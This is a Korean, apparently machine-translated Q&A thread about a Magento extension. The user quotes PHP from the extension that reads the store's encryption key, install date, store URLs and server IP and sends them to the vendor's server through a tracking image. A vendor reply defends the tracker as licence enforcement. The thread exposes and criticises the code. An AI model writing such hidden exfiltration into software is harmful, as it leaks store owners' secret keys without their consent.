모듈이 전역 / 암호 / 키에 원격으로 액세스해야하는 이유는 무엇입니까?

내 무지를 용서하지만 암호 키는 마 젠토 데이터를 해독하는 데 사용됩니다. 모듈이 이것에 액세스 할만한 이유가 있습니까? Advanced Content Manager를 설치 한 후이 코드를 우연히 발견했습니다 ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

예 ... 좋은 이유가 있습니다.
그들은 만일을 대비하여 그것을 알고 기록하기를 원합니다. :)

확장 프로그램을 제거해야합니다 (아마 이미 이미 수행 했음). 어떤 데이터를 집으로 보내는 지에 상관없이 "전화 집"인 내선 번호를 사용해서는 안됩니다.

다른 사람들이 볼 수 있도록 확장 프로그램을 여기에 나열하고 싶을 수도 있습니다. Magento Extensions의 Funny / 쓸모없는 / 끔찍한 코드

오늘이 기능에 대한 지원 요청을 받았습니다. 우리는 이미 그것을 해결 하고이 코드를 제거했습니다. 고객 영역의 모든 고객이 새로운 릴리스를 사용할 수 있습니다 (무제한 업데이트를 제공하므로 무료).

우리는 이것을 정당화해야한다는 것을 알고 있으므로 그렇게하십시오.

• 이 트래커의 목표는 확장 프로그램의 무단 사용을 따르는 것입니다.
• 추적기는 관리 영역에만 표시되었습니다 (귀하의 고객 또는 귀하 이외의 어느 누구도 볼 수 없었습니다).
• 우리는 이것을 DB에서도 제거했습니다.
• 열쇠는 관리자 비밀번호 만 암호화하는 것입니다. 지원 요청을 통해 모든 고객과 협력하는 데 사용하고 있으므로 지원을 위해 자격 증명을 이메일로 이미 이메일로 보냈을 수 있습니다. 우리가 당신의 암호를 원한다면, 우리는 그것을 직접 보냈습니다 ... 그것은 목표가 아니 었습니다.
• 키를 사용해도 비밀번호는 여전히 암호화됩니다. magento admin은 몇 번의 시도 후에 사용자를 차단합니다.

우리는 그것이 실수라는 것을 알고 있으며 이것이 커뮤니티와 오픈 소스 시스템의 강점입니다. 우리는 훨씬 더 빨리 고치고 개선 할 수 있습니다. 우리에게 경고 해 주셔서 감사합니다. 우리는 지금 취약점에 대해 더 많은 노력을 기울일 것입니다.